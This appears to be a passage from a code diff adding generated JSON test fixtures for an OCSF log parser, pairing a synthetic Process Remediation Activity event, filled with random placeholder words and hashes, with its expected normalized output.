\"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}", + "event": { + "action": "harden", + "category": [], + "outcome": "unknown", + "provider": "seller deserve sharing", + "reason": "heaven country sugar", + "sequence": 26, + "severity": 5, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:16.994000Z", + "file": { + "directory": "guilty different comply/expects.accdb", + "hash": { + "sha256": "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698", + "tlsh": "6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0" + }, + "name": "earliest.pdb", + "owner": "Tee", + "path": "guilty different comply/expects.accdb/earliest.pdb", + "type": "Regular File", + "uid": "223ad95e-a02f-11ef-8523-0242ac110007" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "Process Remediation Activity", + "class_uid": 7003, + "process": { + "parent": { + "user": { + "email": "Li@scientific.travel", + "full_name": "Anita Rosanna" + } + } + } + }, + "process": { + "command_line": "guided stretch phrases", + "name": "Success", + "parent": { + "command_line": "suits chris sega", + "entity_id": "223b4aa6-a02f-11ef-9d39-0242ac110007", + "name": "Em", + "pid": 60, + "start": "2024-11-11T13:16:16.999000Z", + "user": { + "id": [ + "223b30c0-a02f-11ef-87cb-0242ac110007" + ], + "name": "Membership" + } + }, + "pid": 94, + "start": "2024-11-11T13:16:16.996000Z", + "user": { + "id": [ + "223aed7c-a02f-11ef-943c-0242ac110007" + ], + "name": "Livestock" + } + }, + "related": { + "hash": [ + "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698" + ], + "user": [ + "Tee" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_2.json b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json new file mode 100644 index 000000000..899ec4fb5 --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json @@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": 